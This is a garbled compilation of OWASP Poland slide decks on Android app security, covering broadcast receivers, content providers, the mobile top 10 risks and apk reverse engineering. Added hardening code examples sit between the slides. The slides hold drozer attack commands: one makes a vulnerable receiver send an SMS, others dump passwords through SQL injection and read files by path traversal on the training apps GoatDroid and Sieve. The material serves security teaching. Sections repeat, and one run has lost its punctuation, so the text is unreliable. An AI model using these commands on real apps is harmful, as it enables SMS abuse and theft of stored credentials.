    Written 24576 bytes
Content providers: demo
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as "Battery Low", "boot completed", "headset plugged in", etc. Though most broadcasts originate from the system, applications can also announce broadcasts.
• If a receiver accepts broadcasts from untrusted sources, the app is at risk.
Broadcast receivers attacks
Typical fail: authorization.
• Enumerate receivers
• Determine how the receiver handles the action
• Send an Intent and enjoy
Broadcast receivers attacks
Sample manifest from GoatDroid:
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
        <intent-filter>
            <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
        </intent-filter>
    </receiver>
    …
    <uses-permission android:name="android.permission.SEND_SMS" />
Broadcast receivers attacks
The following is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action (note that it sends whatever phoneNumber and message any sender puts in the extras, with no check of who sent the broadcast):
    public void onReceive(Context arg0, Intent arg1) {
        context = arg0;
        SmsManager sms = SmsManager.getDefault();
        Bundle bundle = arg1.getExtras();
        sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
        Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
    }
Broadcast receivers attacks
    run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all of the above-mentioned components:
• Set the android:exported attribute to false (only the current app's user ID will be able to access the component)
• Limit access with custom permissions for an activity or other component (RECEIVE_SMS and others)
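Applied to the GoatDroid receiver shown above, the two defenses look like this. This is an added example, not GoatDroid's code: the receiver is registered at runtime behind a signature-level custom permission (the runtime equivalent of android:permission on a manifest <receiver>), the in-app sender uses an explicit Intent, and the extras are validated before SmsManager is called. The permission name and the class name are assumptions; the package must declare the permission in its manifest as noted in the comment.

```java
// Added example, not GoatDroid's code. Assumed manifest declaration in the same package:
//   <permission android:name="org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS"
//               android:protectionLevel="signature" />
package org.owasp.goatdroid.fourgoats.broadcastreceivers;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.telephony.PhoneNumberUtils;
import android.telephony.SmsManager;
import android.util.Log;

public class HardenedSendSMSReceiver extends BroadcastReceiver {
    public static final String ACTION_SOCIAL_SMS = "org.owasp.goatdroid.fourgoats.SOCIAL_SMS";
    // Signature-level: only apps signed with the same certificate can ever hold it.
    public static final String PERMISSION_SOCIAL_SMS =
            "org.owasp.goatdroid.fourgoats.permission.SOCIAL_SMS";
    private static final String TAG = "HardenedSendSMS";
    private static final int MAX_SMS_LENGTH = 160;

    /** Registers the receiver so that only broadcasters holding PERMISSION_SOCIAL_SMS reach it. */
    public static HardenedSendSMSReceiver register(Context context) {
        HardenedSendSMSReceiver receiver = new HardenedSendSMSReceiver();
        IntentFilter filter = new IntentFilter(ACTION_SOCIAL_SMS);
        // 3rd argument: permission the sender must hold (same effect as android:permission).
        context.registerReceiver(receiver, filter, PERMISSION_SOCIAL_SMS, null);
        return receiver;
    }

    /** In-app sender: explicit Intent (this package only) plus a permission the receiver must hold. */
    public static void sendSocialSms(Context context, String phoneNumber, String message) {
        Intent intent = new Intent(ACTION_SOCIAL_SMS);
        intent.setPackage(context.getPackageName());   // never delivered to other apps' receivers
        intent.putExtra("phoneNumber", phoneNumber);
        intent.putExtra("message", message);
        context.sendBroadcast(intent, PERMISSION_SOCIAL_SMS);
    }

    @Override
    public void onReceive(Context context, Intent intent) {
        // Defence in depth: the permission gate already ran, but still refuse anything
        // that is not the expected action or that carries malformed extras.
        if (intent == null || !ACTION_SOCIAL_SMS.equals(intent.getAction())) {
            Log.w(TAG, "Ignoring unexpected broadcast");
            return;
        }
        String phoneNumber = intent.getStringExtra("phoneNumber");
        String message = intent.getStringExtra("message");
        if (!isValidRequest(phoneNumber, message)) {
            Log.w(TAG, "Rejected SMS request with invalid number or message");
            return;
        }
        SmsManager.getDefault().sendTextMessage(phoneNumber, null, message, null, null);
    }

    /** Validation helper: a well-formed dialable number and a non-empty, bounded message. */
    static boolean isValidRequest(String phoneNumber, String message) {
        if (phoneNumber == null || message == null) return false;
        if (!PhoneNumberUtils.isGlobalPhoneNumber(phoneNumber)) return false;
        return !message.isEmpty() && message.length() <= MAX_SMS_LENGTH;
    }
}
```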
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5
• https://manifestsecurity.com/android-application-security-part-8
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to give you basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in data stores on the device in an insecure format (plain text or reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
  – SQLite databases (local)
  – XML data stores
  – Plain text configuration files
  – Cookie stores
  – SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes in /sdcard before and after installing the application
• Analyze the package files at different stages:
    adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted, world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases, consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or implements it incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
  – Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
  – Securing only part of the communication (e.g. only authentication)
  – Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the browser's side
• It is done by a "chain of trust"
• But how can a mobile app know that it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
    if (presented_cert == pinned_cert)
        Start_connection()
    else
        Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check whether all traffic is encrypted)
• Use Mallodroid:
    mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
    sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - a few facts from reality
• According to FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store:
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about a developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakage
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
    dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
    adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false")
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
    dz> run app.activity.start --component <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example, the Viber app: https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be re-enforced on the server side whenever possible
• Persistent authentication ("Remember Me") functionality implemented within mobile applications should never store a user's password on the device. It should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or implementing it in an insecure way
• A few reminders (yeah, I know you know it…):
  – encoding ≠ encryption
  – obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the apk using dex2jar (or Luyten for a more verbose result) and review the jar file in JD-GUI
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA1, etc.)
Broken Cryptography - example
• An encrypted db is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault
Broken Cryptography - mitigations
• Use known strong cryptography implementations
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device. Use password-based encryption instead
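What "password-based encryption instead of a stored key" means in practice, as an added example (not code from the slides or from any of the apps mentioned): the key is derived from the user's password with PBKDF2 and a random salt each time it is needed, the data is sealed with AES-GCM, and only the salt, nonce and ciphertext are written to the device, so there is nothing for a decompiler or a "readable folder" to recover. The iteration count and salt/nonce sizes are choices made here.

```java
import java.nio.ByteBuffer;
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.security.spec.KeySpec;
import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;

/** Added example: password-derived AES-GCM sealing; no long-term key ever touches storage. */
public final class PasswordSealedData {
    private static final int SALT_LEN = 16, NONCE_LEN = 12, TAG_BITS = 128, KEY_BITS = 256;
    // Iteration count is a tuning choice: aim for roughly 100 ms on the slowest supported device.
    private static final int ITERATIONS = 100_000;
    // PBKDF2WithHmacSHA256 needs Android 8.0+ (or any Java 8 JRE); older Android only ships the SHA1 variant.
    private static final String KDF = "PBKDF2WithHmacSHA256";
    private static final SecureRandom RNG = new SecureRandom();

    /** Output layout: salt || nonce || ciphertext+tag. None of these three needs to be secret. */
    public static byte[] seal(char[] password, byte[] plaintext) throws GeneralSecurityException {
        byte[] salt = new byte[SALT_LEN], nonce = new byte[NONCE_LEN];
        RNG.nextBytes(salt);    // fresh salt per sealing: identical passwords give different keys
        RNG.nextBytes(nonce);   // fresh nonce per sealing: never reuse a nonce under one key
        Cipher gcm = Cipher.getInstance("AES/GCM/NoPadding");
        gcm.init(Cipher.ENCRYPT_MODE, deriveKey(password, salt), new GCMParameterSpec(TAG_BITS, nonce));
        byte[] ct = gcm.doFinal(plaintext);
        return ByteBuffer.allocate(SALT_LEN + NONCE_LEN + ct.length).put(salt).put(nonce).put(ct).array();
    }

    /** Re-derives the key; a wrong password or a tampered blob fails the GCM tag (AEADBadTagException). */
    public static byte[] open(char[] password, byte[] sealed) throws GeneralSecurityException {
        ByteBuffer buf = ByteBuffer.wrap(sealed);
        byte[] salt = new byte[SALT_LEN], nonce = new byte[NONCE_LEN];
        buf.get(salt);
        buf.get(nonce);
        byte[] ct = new byte[buf.remaining()];
        buf.get(ct);
        Cipher gcm = Cipher.getInstance("AES/GCM/NoPadding");
        gcm.init(Cipher.DECRYPT_MODE, deriveKey(password, salt), new GCMParameterSpec(TAG_BITS, nonce));
        return gcm.doFinal(ct);
    }

    /** The AES key exists only in memory, for as long as the caller keeps it. */
    static SecretKey deriveKey(char[] password, byte[] salt) throws GeneralSecurityException {
        KeySpec spec = new PBEKeySpec(password, salt, ITERATIONS, KEY_BITS);
        byte[] raw = SecretKeyFactory.getInstance(KDF).generateSecret(spec).getEncoded();
        return new SecretKeySpec(raw, "AES");
    }
}
```

For a whole SQLite database the same idea is what SQLCipher does when it is given a passphrase rather than a raw key.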
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
  – Another application, via an intent/content provider
  – A shared file
  – A server response
  – A third-party website
Client side injection – what to inject
• SQL injection into the local db
• XSS/WebView injection
• Directory traversal
• Intent injection
A new Android toy – the Intents
• An Android application can talk (Inter-Process Communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
    Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
    dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
    dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
    dz> run app.package.manifest -a <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• The UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the "smdm" prefix allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid using intent-filters. Even if the Activity has the attribute exported="false", another application can define the same filter and the system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
  – Verify if a session expires (copy a cookie and try to use it after 30 minutes)
  – Verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another logged-in user)
  – Verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as a session token)
Improper session handling – a few facts from reality
• What we know is that "sessions have to expire"…
• …but how long should one REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
- http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate the session on the server side
• Set the session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources
Thank you
pawelrzepa@outlook.com
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security
• https://mobilesecuritywiki.com
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone:
  – APK Optic
  – Astro File Manager
• Using ADB
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – assembly code
• Why disassembling and not decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
  – Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
  – Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
  – Closed source Java decompiler
  – Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
  – Open source Java tool for reverse-engineering Android apps
  – Transforms binary Dalvik bytecode (dex) into Smali source
Signing apk
• Using signapk.jar:
    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure format (plain text or reversible encoding)
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML data stores
– Plain text configuration files
– Cookie stores
– SD card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes in sdcard before and after installing an application
• Analyze package files at different stages:
    adb pull /data/data/<apk_package_name>
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean, "incorrectly"?
• Insecure implementations are:
– Using known weak ciphers/protocol versions (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• The expected X.509 certificate or public key is embedded in the source code:
    if (presented_cert == pinned_cert)
        Start_connection()
    else
        Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid: mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest for a public domain):
    sslyze --regular www.example.com:443
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014, among the 1000 most-downloaded free applications in the Google Play store
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
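As an added example (not from the slides, and not any real app's code), the Python snippet below audits a client TLS configuration for the failure modes listed under M3 (trusting all certificates, accepting all hostnames, old protocol versions) and implements the pin check from the pseudocode above. The certificate byte strings are constructed stand-ins for DER data and the hostname api.example.test is made up.

```python
"""TLS client configuration audit and certificate pinning (added example)."""
import hashlib
import hmac
import ssl


def audit_context(ctx):
    """Return the weaknesses found in an ssl.SSLContext, in M3's terms."""
    problems = []
    if ctx.verify_mode == ssl.CERT_NONE:
        problems.append("trusts all certificates (verify_mode=CERT_NONE)")
    if not ctx.check_hostname:
        problems.append("accepts all hostnames (check_hostname=False)")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        problems.append("allows protocol versions below TLS 1.2")
    return problems


def insecure_context():
    """The 'trust everything' client the Hannover study kept finding."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # must be switched off before verify_mode
    ctx.verify_mode = ssl.CERT_NONE  # no chain validation at all
    return ctx


def secure_context():
    """Chain validation, hostname check and TLS 1.2 or newer only."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED, check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def fingerprint(der_bytes):
    """SHA-256 over the DER blob that is pinned (certificate or SPKI)."""
    return hashlib.sha256(der_bytes).hexdigest()


def pin_accepts(presented_der, pinned_fingerprints):
    """The if/else from the slide: start the connection only on a match.

    A set of pins lets a backup key be rotated in without an app update;
    hmac.compare_digest keeps the comparison constant-time.
    """
    presented = fingerprint(presented_der)
    return any(hmac.compare_digest(presented, pin) for pin in pinned_fingerprints)


# Constructed stand-ins for DER-encoded certificates (not real X.509 data).
SERVER_CERT = b"constructed-der:CN=api.example.test:key=1"
BACKUP_CERT = b"constructed-der:CN=api.example.test:key=2"
ROGUE_CERT = b"constructed-der:CN=api.example.test:key=interceptor"
PINS = {fingerprint(SERVER_CERT), fingerprint(BACKUP_CERT)}


if __name__ == "__main__":
    print("insecure:", audit_context(insecure_context()))
    print("secure:  ", audit_context(secure_context()))
    for cert in (SERVER_CERT, BACKUP_CERT, ROGUE_CERT):
        print(cert, "->", "connect" if pin_accepts(cert, PINS) else "drop")
```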
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL caching
• Copy/Paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
    dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged using ADB:
    adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (observe what you're storing in crash logs)
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or leverage your privileges then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by accessing exported activities using Drozer:
    dz> run app.activity.start --component <component_name>
